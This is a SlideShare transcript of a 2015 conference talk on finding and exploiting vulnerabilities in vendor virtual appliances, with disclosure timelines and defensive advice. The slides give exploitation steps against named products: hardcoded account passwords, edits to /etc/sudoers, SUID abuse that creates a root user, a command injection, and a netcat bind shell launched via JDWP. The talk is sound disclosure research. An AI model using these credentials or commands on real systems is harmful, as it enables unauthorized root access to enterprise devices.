SlideShare a Scribd company logo

Hacking Virtual Appliances

Download as PPTX, PDF
Jeremy Brown
Jeremy Brown

POC Conference 2015 Virtual Appliances have become very prevalent these days as virtualization is ubiquitous and hypervisors commonplace. More and more of the major vendors are providing literally virtual clones for many of their once physical-only products. Like IoT and the CAN bus, it's early in the game and vendors are late as usual. One thing that it catching these vendors off guard is the huge additional attack surface, ripe with vulnerabilities, added in the process. Also, many vendors see software appliances as an opportunity for the customer to easily evaluate the product before buying the physical one, making these editions more accessible and debuggable by utilizing features of the platform on which it runs. During this talk, I will provide real case studies for various vulnerabilities created by mistakes that many of the major players made when shipping their appliances. You'll learn how to find these bugs yourself and how the vendors went about fixing them, if at all. By the end of this talk, you should have a firm grasp of how one goes about getting remote root on appliances.

Technology
1 of 125
Hacking Virtual Appliances Jeremy Brown, 2015
Agenda I. Introduction II. Public Examples III. Image Analysis IV. Newer Bugs I. (un)documented Accounts II. Misc Bugs III. Password Litter IV. Bootloader Access V. Conclusion
#whoami • Jeremy Brown – Independent researcher / consultant – Formerly of Microsoft • Windows/Phone/Xbox Security • Malware Protection Center – Also, Tenable • Nessus • RE patches
What I’m Not Talking About • Web bugs that don’t directly lead to a shell – XSS, CSRF, XSHM, ... – Clickjacking (is this still a thing?) • Decrypting VM images – This is pre-bug hunting stuff
What I’m Talking About • Remote Shells – Command injection – Backdoor or “support” accounts • Privilege Escalation – Once we have a shell, let’s escalate to root • Other Interesting Bugs – Format strings, misconfigured services – Passwords littered all over the filesystem
What is a Virtual Appliance? • Appliances – Network management, Firewall, Kiosk, SIEM, etc • Virtual Appliance – Hardware – Software • OS with application suite pre-installed
What is a Virtual Appliance? • Physical Appliance – “Let’s give them a box with some Ethernet jacks, restrict functionality and lock update availability to a support contract” • Virtual Appliance – “Let’s dump / configure all the device’s software and OS to a VM image and ship it to datacenters”
What is a Virtual Appliance? References: https://www.vmware.com/files/pdf/vam/VMware_Virtual_Appliance_Solutions_White_Paper_08Q3.pdf https://vmware-partnerpedia-shared.s3.amazonaws.com/documents/Virtual_Appliance_Whitepaper.pdf http://www.forescout.com/wp-content/media/FS-Virtual_Appliance_Tech_Note.pdf
Important Distinction • The bugs found aren’t specific to environment and Administrator, they are vendor-specific – Eg. These are shipped, not created upon provision • One bug rules them all, just like applications – Except VAs aren’t apps, they’re scalable like PCs
Popular Vendors • IBM, EMC, HP, Oracle, Symantec, SonicWall, VMware, Cisco • SAP – Thanks a lot for the cloud-only trials!
Pros/Cons for Bug Hunting • Pros – Likely share 95% same code as physical device – Common mindset of “customers don’t have root” which leads to shipping a “litter box” • Cons – You can’t really make support phone calls
Why go after these appliances? • Prevalence – More vendors offering both options for delivery • Entertainment • Value
Entertainment • “Here’s an image of my work PC!” – .ssh/known_hosts – .viminfo, .bash_history
Entertainment
Entertainment References: install.log https://crackstation.net
Entertainment
Entertainment …..
Entertainment • WHY WOULD ANYONE SUID ROOT THE ID BINARY!?!?!
Value • These are obviously used in the enterprise • Enterprises put a lot of money in security – Money != Results, but let’s not worry about that – If nothing else, we are in compliance • Customers (often more than vendors) want these bugs fixed
Why is security so bad? • Many vendors don’t see what the big deal is – “Here’s a computer, go set it up, it’s real easy, change the passwords if you want to, it’s fine” Reference: http://www.adempiere.com/ADempiere_Virtual_Appliance_Install
Acquiring VAs • Vendor Websites – “Free Trial” – “Request Evaluation” – “Demo Now” • Some of these are dummy VMs, some are real • Make a purchase • Not available – Unless you’re a partner with support contract :’(
Agenda I. Introduction II. Public Examples III. Image Analysis IV. Newer Bugs I. (un)documented Accounts II. Misc Bugs III. Password Litter IV. Bootloader Access V. Conclusion
Public Examples Image: http://www.journalismdegree.com/wp-content/uploads/news-conference.jpg
Command Injection • Sophos Web Protection Appliance
Command Injection • Sophos is noted for having fixed this 03/2013 – Still works as of early 2015 Reference: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130403- 0_Sophos_Web_Protection_Appliance_Multiple_Vulnerabilities.txt
Documented Accounts • Hortonworks Sandbox Reference: http://hortonworks.com/customers/
Documented Accounts • $ ssh vagrant@hw-sandbox – vagrant@Hadoop-'s password: [vagrant] • [vagrant@sandbox ~]$ sudo bash • [root@sandbox vagrant]#
Documented Accounts References: https://github.com/hortonworks/structor http://www.slideshare.net/oom65/structor-automated-building-of-virtual-hadoop-clusters
Agenda I. Introduction II. Public Examples III. Image Analysis IV. Newer Bugs I. (un)documented Accounts II. Misc Bugs III. Password Litter IV. Bootloader Access V. Conclusion
Image Analysis • Virtual Appliance distribution – OVA containers provide the disk image and metadata (VMware, VirtualBox) – VAs may also come as just a VHD (Hyper-V)
Image Analysis • Dynamic View – Boot up the system and use the local system – “What you see is what you get” • Procedure – Load VM image into hypervisor • Limitations – Trouble if root isn’t default or shell is locked down – Motive to find privilege escalation bugs though 
Image Analysis • Static View – Browse filesystem in a tree view – Use regex to look for interesting patterns • Procedure – Convert to raw filesystem (eg. qemu-img) – Browse with an imager / forensic toolkit • Limitations – “First boot” scripts could change initial values
Agenda I. Introduction II. Public Examples III. Image Analysis IV. Newer Bugs I. (un)documented Accounts II. Misc Bugs III. Password Litter IV. Bootloader Access V. Conclusion
Newer Bugs Image: https://recodetech.files.wordpress.com/2014/02/password_hacking.png
Documented Accounts • Cisco Paging Server v11 – OEM for Singlewire Software
Documented Accounts • SSHD, Webmin and the Web Interface – The first two share the same auth system – The last one does not • So what happens when you change the admin password in the web interface?
Documented Accounts • This section only applies to the web interface • They never talk about changing sshd/wm credentials • The documentation calls out the default password, but never asks or warns the user to change it!@# Reference: http://www.cisco.com/c/dam/en/us/td/docs/voice_ip_comm/cucm/singlewire/InformaCastBasicPaging.pdf
Documented Accounts • admin@cisco-paging's password: [changeMe] – Linux singlewire 3.2.0-4-686-pae #1 SMP Debian 3.2.57-3+deb7u2 i686 – admin@singlewire:~$
Documented Accounts • Cisco might chalk this up a documentation bug – But you can go own a bunch of paging servers
Undocumented Accounts • EMC PowerPath Reference: http://www.emc.com/products-solutions/trial-software-download/ppve.htm
Undocumented Accounts • Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X2]) – password (emcupdate) Image: /via @bl4sty
Undocumented Accounts • $ ssh emcupdate@emc-pp – Password: [password] – emcupdate@localhost:~> • https://emc-pp:5480/#update.Config
Undocumented Accounts • IBM SmartCloud Monitoring (Trial-only tested) Reference: http://www-03.ibm.com/software/products/en/ibmsmarmoni/
Undocumented Accounts • 6 users on the system with bash shells – 2 users aren’t documented
Undocumented Accounts • $ ssh db2sdfe1@smartcloud – Password: [smartway] • db2sdfe1@scmtrial:~> id – uid=1003(db2sdfe1) gid=114(db2fsdm1) groups=16(dialout),33(video),114(db2fsdm1)
Undocumented Accounts • VMware Horizon Mobile Manager
Undocumented Accounts • $ ssh mmp@vmware-hmm – # This is a dummy banner. Replace this with your own banner, appropriate for the VA – mmp@vmware-hmm's password: [mmp] • mmp@localhost:~> id – uid=1001(mmp) gid=100(users) groups=100(users),16(dialout),33(video)
Undocumented Accounts • VMware probably isn’t going to fix it as it’s EOL soon • Tested v1.3, so 1.3.1 *may* have fixed this – Couldn’t find a way to update to 1.3.1 – So what if customers can’t update either? – No docs on how to update nor what was fixed Reference: https://my.vmware.com/group/vmware/info?slug=desktop_end_user_computing/vmware_horizon_mobile/1_3
Undocumented Accounts • Cisco MSE (Mobility Services Engine) Reference: http://www.cisco.com/c/en/us/support/docs/wireless/mobility-services-engine/113462-mse-ha-config-dg-00.html
Undocumented Accounts • Two user accounts on this appliance – root – oracle (!?) • Upon install, root’s password is set by admin – oracle is untouched
Undocumented Accounts • Cracking the password hash was unsuccessful – They must have set the password during install
Undocumented Accounts • We search the filesystem and finally… BINGO
Undocumented Accounts • $ ssh oracle@cisco-mse – oracle@cisco-mse's password: [XmpDba123] • -bash-3.2$ id – uid=440(oracle) gid=201(xmpdba) groups=200(oinstall),201(xmpdba),202(xmpoper) context=user_u:system_r:unconfined_t:s0
Undocumented Accounts • We have user.. but we want root • Let’s take a look at the post-install log file • Uh, they SUID root copies of chmod / chown – I think we can work with that!
Undocumented Accounts • -bash-3.2$ ls -al /etc/sudoers – -r--r----- 1 root root 4789 Mar 6 00:27 /etc/sudoers • -bash-3.2$ – /opt/mse/framework/bin/setbackupown oracle /etc/sudoers – /opt/mse/framework/bin/setbackupmod 644 /etc/sudoers
Undocumented Accounts • -bash-3.2$ ls -al /etc/sudoers – -rw-r--r-- 1 oracle root 4789 Mar 6 00:27 /etc/sudoers • Now that’s more like it 
Undocumented Accounts • -bash-3.2$ echo "oracle ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers • -bash-3.2$ sudo bash – sudo: /etc/sudoers is mode 0644, should be 0440 – sudo: no valid sudoers sources found, quitting • Ok, ok, let’s clean up after ourselves..
Undocumented Accounts • Ok, ok, let’s clean up after ourselves • -bash-3.2$ – /opt/mse/framework/bin/setbackupown root /etc/sudoers – /opt/mse/framework/bin/setbackupmod 440 /etc/sudoers
Undocumented Accounts • -bash-3.2$ sudo bash • bash-3.2# id – uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6( disk),10(wheel) context=user_u:system_r:unconfined_t:s0
Undocumented Accounts • HP Enterprise Maps Reference: https://ssl.www8.hp.com/us/en/ssl/dlc/secure_software.html?prodNumber=H7P56BAE&siebelid=7820
Undocumented Accounts • Documentation says use the vagrant account • But let’s take a look at the filesystem – In /etc/shadow we find another enabled user • So, if we’re able to crack this password… Reference: Virtual_Appliance_Letter_H7P56-88003.pdf
Undocumented Accounts • And SSHD runs by default – And has remote root login enabled (!?) • Why would an undocumented user need to be allowed to remote into the box?
Undocumented Accounts • $ ssh root@mapserver – root@mapserver’s password: [hpdemo] – […..] – This console does not provide access to Enterprise Maps. Use your web browser! • root@hpdemo:~# id – uid=0(root) gid=0(root) groups=0(root)
Undocumented Accounts • Due to extremely poor security, it’s questionable if it was just a one-off demo • But it was concluded a functioning appliance – Contains a license that can be renewed – It receives security updates from HP – There have been public bugs in previous versions Reference: https://packetstormsecurity.com/files/127239/HP-Enterprise-Maps-1.00-Authenticated-XXE-Injection.html
Undocumented Accounts • I sent this bug to ZDI (acquired by HP in 2010) – They offered me 600 points (not cash) • I thought this must be a mistake, but it wasn’t Reference: http://www.zerodayinitiative.com/about/benefits/
Silent Patches • SevOne – NMS (Network Management System)
Silent Patches • Found an undocumented account • $ ssh cmcdr@sevone – Password: [cmcdr] • [cmcdr@SevOne:/] [S1V: 5.3.6.0] [04:04:55] $
Silent Patches • Found a juicy looking SUID binary • $ ls -al /usr/bin/aslookup – -r-s--x--x 1 root bin 12752 Mar 26 2013 /usr/bin/aslookup • $ /usr/bin/aslookup `perl -e 'print "B" x 1023'` – *** buffer overflow detected ***: /usr/bin/aslookup terminated
Silent Patches • If we search for cmcdr account • But the URL has been removed…
Silent Patches • See cache
Silent Patches • The latest for public download was v5.3.6 – But this was fixed in v5.3.8 • The perks of being a customer I guess
Command Injection • SolarWinds Log and Event Manager • Runs SSH server on port 32022 – Default creds are cmc:password Reference: http://www.solarwinds.com/log-event-manager.aspx
Command Injection • cmc::acm# ping – Enter an IP address or hostname to ping: `bash>&2` – […] – cmc@swi-lem:/usr/local/contego$ id • uid=1001(cmc) gid=1000(trigeo) groups=1000(trigeo),4(adm),24(cdrom),25(floppy),104 (postgres),105(snort),1002(dbadmin)
Command Injection • Mgrconfig is the main cmc interface – /usr/local/contego/scripts/mgrconfig.pl • It calls various shell scripts to implement cmds – contegocontrol.sh is writable by the cmc user • AND this script is called via sudo – cmc ALL=(ALL) NOPASSWD: /usr/local/contego/scripts/*.sh, […]
Command Injection • If we add something useful to contegocontrol – echo "ALL ALL=NOPASSWD: /bin/bash" >> /etc/sudoers – And issue one of the cmds which trigger the script • cmc@swi-lem:/usr/local/contego$ sudo bash – /usr/local/contego # id • uid=0(root) gid=0(root) groups=0(root)
Format String Bug • SolarWinds Log and Event Manager – cmc::acm# ping • Enter an IP address or hostname to ping: %p • [NO] Ping NOT received from 7f9830 • Although this CLI was written in Perl.. – You might want to give that 2005 paper a read Reference: http://www.securityfocus.com/archive/1/418460/30/0/threaded
Root password? • SolarWinds LEM & Others References: http://knowledgebase.solarwinds.com/kb/questions/4921/LEM+Appliance+Security+Information+for+v5.6+and+Later https://thwack.solarwinds.com/community/solarwinds-community/product-blog/blog/2013/09/03/what-were- working-on--log-and-event-manager-lem https://thwack.solarwinds.com/thread/44161 https://thwack.solarwinds.com/thread/55095
Crazy SUID Binaries • Cisco Prime Infrastructure – “Simplified Management from Branch to DataCenter” • ade # cat suid.log | wc -l – 67
Crazy SUID Binaries • ade # cat suid.log | grep -i shell – /opt/CSCOlumos/bin/runShellCommand – /opt/CSCOlumos/bin/runShellAsRoot
Crazy SUID Binaries Reference: /opt/CSCOlumos/bin/runShellAsRoot
Crazy SUID Binaries • $ /opt/CSCOlumos/bin/runShellAsRoot – Segmentation fault (core dumped) • They didn’t even check if given an argument
Crazy SUID Binaries • So let’s give it an argument! • $ cat /tmp/test – id • $ /opt/CSCOlumos/bin/runShellAsRoot /tmp/test – uid=0(root) gid=0(root) groups=502(cisco)
Crazy SUID Binaries • What about that runShellCommand program? • $ /opt/CSCOlumos/bin/runShellCommand id – String obtained on concatenation is 2 id – uid=0(root) gid=0(root) groups=502(cisco)
Crazy SUID Binaries • Gotta give them credit though – It looks like they really stepped up security here
Crazy SUID Binaries • Ooops! • $ /opt/CSCOlumos/bin/runShellCommand /usr/sbin/useradd -o -u 0 -g 0 -p 123456 root2 – String obtained on concatenation is 10 /usr/sbin/useradd -o -u 0 -g 0 -p 123456 root2 • $ tail -1 /etc/passwd – root2:x:0:0::/home/root2:/bin/bash
Crazy SUID Binaries + Remote • Cisco Prime Collaboration Assurance Reference: http://www.cisco.com/c/en/us/products/cloud-systems-management/prime-collaboration/index.html
Crazy SUID Binaries + Remote • Two accounts on the system – Root password is set upon install – Cmuser password is only reset only upon login • Default password is also cmuser • Corner-case: setup without full configuration – So this isn’t widely exploitable, but the case study is noteworthy
Crazy SUID Binaries + Remote • Locally, we see an interesting SUID binary – /opt/system/bin/firewall • Obviously controls the firewall rules
Crazy SUID Binaries + Remote • Also, there’s an interesting server currently unexposed remotely due to the firewall – tcp 0 0 0.0.0.0:8010 0.0.0.0:* LISTEN 5637/emsam_perfmonengine • Turns out to be a Java Debug Server – Wasn’t this hacked into pieces before?
Crazy SUID Binaries + Remote Reference: http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html
Crazy SUID Binaries + Remote • So maybe we can.. turn the firewall off? – [cmuser@cpca ~]$ /opt/system/bin/firewall -v -c • Clearing the firewall
Crazy SUID Binaries + Remote • $ python jdwp-shellifier.py -t cpca -p 8010 --cmd "/home/cmuser/nc -l -p 5555 -e /bin/bash" – [+] Targeting 'cpca:8010' – [+] Reading settings for 'Java HotSpot(TM) 64-Bit Server VM - 1.6.0_81' – ….. – [+] Runtime.getRuntime() returned context id:0x9d2 – [+] found Runtime.exec(): id=4ba62af8 – [+] Runtime.exec() successful, retId=9d3 – [!] Command successfully executed
Crazy SUID Binaries + Remote • $ nc cpca 5555 – id – uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6 (disk),10(wheel)
Crazy SUID Binaries + Remote • There are many more SUID binaries on the appliance – firewall was just the most useful today • And many services likely to have bugs and default logins which never get changed – Hawtio web console (admin:admin) @ port 8161
Password Litter • Panopta OnSight • Supported by CloudFlare – “[..] provides advanced server monitoring and outage management services to both enterprises and SMBs” Reference: https://www.cloudflare.com/apps/panopta Image: https://twitter.com/panopta
Password Litter • Good job generating random credentials
Password Litter • But, they forgot to remove the .bash_history – Which just so happened to contain a typo 
Password Litter • $ ssh panopta.admin@pan-onsight – panopta.admin@ pan-onsight's password: [rb2svin9bwx7] • [….] • panopta.admin@onsight:~$
Password Litter • panopta.admin@onsight:~$ sudo bash – [sudo] password for panopta.admin: [same pass] • root@onsight:~# id – uid=0(root) gid=0(root) groups=0(root)
Password Litter • Wait, wait.. – Does that mean they’re keeping static passwords for users other than the customer’s admin account?
Bootloader Access • Sophos Web Appliance Proxy Reference: /grub/menu.lst
Bootloader Access
Bootloader Access • Again, nobody (at Sophos) really cares about the boot password – But, they should take note of proper file deletion
Agenda I. Introduction II. Public Examples III. Image Analysis IV. Newer Bugs I. (un)documented Accounts II. Misc Bugs III. Password Litter IV. Bootloader Access V. Conclusion
Vendor Communication
Brief Disclosure Timelines • SolarWinds – We’ll send our pgp key soon! fixed in ~5 months • EMC – fixed the bug in just over a month • Panopta – noted “patched potential security vulnerability” • Cisco (Prime Infrastructure) – released a private advisory after several months
Brief Disclosure Timelines • VMware – Contacted me days before initial disclosure (9/26) – I sent them full details and haven’t heard back • SolarWinds – Fixed command injection on 09/01/2015 • Cisco (Mobility Services Engine) – Fixed undocumented account / PE on 11/04/2015 Reference: http://www.solarwinds.com/documentation/lem/docs/releasenotes/releasenotes.htm
SecuriTeam Secure Disclosure • Many of these bugs were fixed through the SSD program at Beyond Security • More info – http://www.beyondsecurity.com/ssd.html
Playing Defense • Clean it up before you ship it! – Don’t leave passwords in plain text to all users – Don’t leave crazy SUID binaries on boxes – Nonsense is shipping .ssh and .vim directories • Stop thinking it’s OK to have users on the system with passwords unknown to customers
Playing Defense • Firewalling services is a great practice – (typically) There’s no point in auditing a service only accessible to localhost • Make users set all passwords or generate random ones for them upon install – Generating one for all the clones is not enough – Setting them to “password” is worst
Playing Defense • Blacklisting users from remote access – Cisco Prime Collaboration Deployment • We’re able to login locally, but no SSH
Solutions • Don’t mix demos and trials – This leads to bad security assumptions • Don’t ship the master development VM – Separate dev and shipping images • Checklist of “must not haves” for each VM – Most of the issues likely wouldn’t be found with code review
Must Not Haves • Accounts – default passwords – undocumented (document them!) • Files – unencrypted passwords in logs – containing sensitive data (history, db, etc) • Local System – world-executable & SUID – world-writable scripts
Must Not Haves • Services – Locally-meant, but listening on the network – Using different authentication systems • Assumptions – “This is only a demo or trial, not for production” – “I can hide this private key in this hidden folder” – “Only an admin can execute this script” – These can be invalidated via code churn / updates
Esoteric Thoughts • Lots of installation collateral shipped – Eg. backup, restore, /install directories • Vendor services – Helpers listening on local and network interfaces – Think about “support” services / remote access • Read the documentation – Can be the difference between a bug and technically a feature
Esoteric Thoughts • Forensics would be a game changer here – Professional suites are pretty expensive, but… – “We’re deleted all the sensitive files, boss”
Things are heating up Reference: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150625-ironport
Conclusion • This area is still largely unexplored • They’re only going to become more prevalent – More vendors will start converting metal -> bits – It’s cheaper and datacenters rule these days • And there’s a lot more work to do – Getting access to these is one hurdle (eg. FireEye) – The vendor (properly) fixing the bugs is another
The End Questions?

Recommended

A Bug Hunter's Perspective on Unix Drivers
A Bug Hunter's Perspective on Unix DriversA Bug Hunter's Perspective on Unix Drivers
A Bug Hunter's Perspective on Unix DriversJeremy Brown
 
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Jeremy Brown
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device InsecurityJeremy Brown
 
Introduction to Browser Fuzzing
Introduction to Browser FuzzingIntroduction to Browser Fuzzing
Introduction to Browser Fuzzingn|u - The Open Security Community
 
Distributed Fuzzing Framework Design
Distributed Fuzzing Framework DesignDistributed Fuzzing Framework Design
Distributed Fuzzing Framework Designbannedit
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)ClubHack
 
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...44CON
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNEDChris Gates
 

Recommended

A Bug Hunter's Perspective on Unix Drivers
A Bug Hunter's Perspective on Unix DriversA Bug Hunter's Perspective on Unix Drivers
A Bug Hunter's Perspective on Unix DriversJeremy Brown
 
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Jeremy Brown
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device InsecurityJeremy Brown
 
Introduction to Browser Fuzzing
Introduction to Browser FuzzingIntroduction to Browser Fuzzing
Introduction to Browser Fuzzingn|u - The Open Security Community
 
Distributed Fuzzing Framework Design
Distributed Fuzzing Framework DesignDistributed Fuzzing Framework Design
Distributed Fuzzing Framework Designbannedit
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)ClubHack
 
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...44CON
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNEDChris Gates
 
ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorMichele Orru
 
Exploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSExploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSCsaba Fitzl
 
When is something overflowing
When is something overflowingWhen is something overflowing
When is something overflowingPeter Hlavaty
 
BSides Hannover 2015 - Shell on Wheels
BSides Hannover 2015 - Shell on WheelsBSides Hannover 2015 - Shell on Wheels
BSides Hannover 2015 - Shell on Wheelsinfodox
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestCsaba Fitzl
 
Visiting the Bear Den
Visiting the Bear DenVisiting the Bear Den
Visiting the Bear DenESET
 
Level Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege EscalationLevel Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege Escalationjakx_
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devicesNikhil Mittal
 
Software Security : From school to reality and back!
Software Security : From school to reality and back!Software Security : From school to reality and back!
Software Security : From school to reality and back!Peter Hlavaty
 
Заполучили права администратора домена? Игра еще не окончена
Заполучили права администратора домена? Игра еще не оконченаЗаполучили права администратора домена? Игра еще не окончена
Заполучили права администратора домена? Игра еще не оконченаPositive Hack Days
 
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?Aditya K Sood
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectPeter Hlavaty
 
Steelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trashSteelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trashinfodox
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...Hackito Ergo Sum
 
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco GrassiShakacon
 
Getting root with benign app store apps
Getting root with benign app store appsGetting root with benign app store apps
Getting root with benign app store appsCsaba Fitzl
 
Steelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with PythonSteelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with Pythoninfodox
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Michele Orru
 
Hacking - high school intro
Hacking - high school introHacking - high school intro
Hacking - high school introPeter Hlavaty
 
Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Peter Hlavaty
 
Vagrant + Ansible + Docker
Vagrant + Ansible + DockerVagrant + Ansible + Docker
Vagrant + Ansible + DockerVijay Selvaraj
 
Vagrant, Ansible and Docker - How they fit together for productive flexible d...
Vagrant, Ansible and Docker - How they fit together for productive flexible d...Vagrant, Ansible and Docker - How they fit together for productive flexible d...
Vagrant, Ansible and Docker - How they fit together for productive flexible d...Samuel Lampa
 

More Related Content

What's hot

ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorMichele Orru
 
Exploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSExploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSCsaba Fitzl
 
When is something overflowing
When is something overflowingWhen is something overflowing
When is something overflowingPeter Hlavaty
 
BSides Hannover 2015 - Shell on Wheels
BSides Hannover 2015 - Shell on WheelsBSides Hannover 2015 - Shell on Wheels
BSides Hannover 2015 - Shell on Wheelsinfodox
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestCsaba Fitzl
 
Visiting the Bear Den
Visiting the Bear DenVisiting the Bear Den
Visiting the Bear DenESET
 
Level Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege EscalationLevel Up! - Practical Windows Privilege Escalation
Level Up! - Practical Windows Privilege Escalationjakx_
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devicesNikhil Mittal
 
Software Security : From school to reality and back!
Software Security : From school to reality and back!Software Security : From school to reality and back!
Software Security : From school to reality and back!Peter Hlavaty
 
Заполучили права администратора домена? Игра еще не окончена
Заполучили права администратора домена? Игра еще не оконченаЗаполучили права администратора домена? Игра еще не окончена
Заполучили права администратора домена? Игра еще не оконченаPositive Hack Days
 
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?Aditya K Sood
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectPeter Hlavaty
 
Steelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trashSteelcon 2015 - 0wning the internet of trash
Steelcon 2015 - 0wning the internet of trashinfodox
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...Hackito Ergo Sum
 
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi50 Shades of Fuzzing by Peter Hlavaty & Marco Grassi
50 Shades of Fuzzing by Peter Hlavaty & Marco GrassiShakacon
 
Getting root with benign app store apps
Getting root with benign app store appsGetting root with benign app store apps
Getting root with benign app store appsCsaba Fitzl
 
Steelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with PythonSteelcon 2014 - Process Injection with Python
Steelcon 2014 - Process Injection with Pythoninfodox
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Michele Orru
 
Hacking - high school intro
Hacking - high school introHacking - high school intro
Hacking - high school introPeter Hlavaty
 
Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Peter Hlavaty
 

What's hot (20)

ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchor
 
Exploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSExploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOS
 
When is something overflowing
When is something overflowingWhen is something overflowing
When is something overflowing
 
BSides Hannover 2015 - Shell on Wheels
BSides Hannover 2015 - Shell on WheelsBSides Hannover 2015 - Shell on Wheels
BSides Hannover 2015 - Shell on Wheels
 
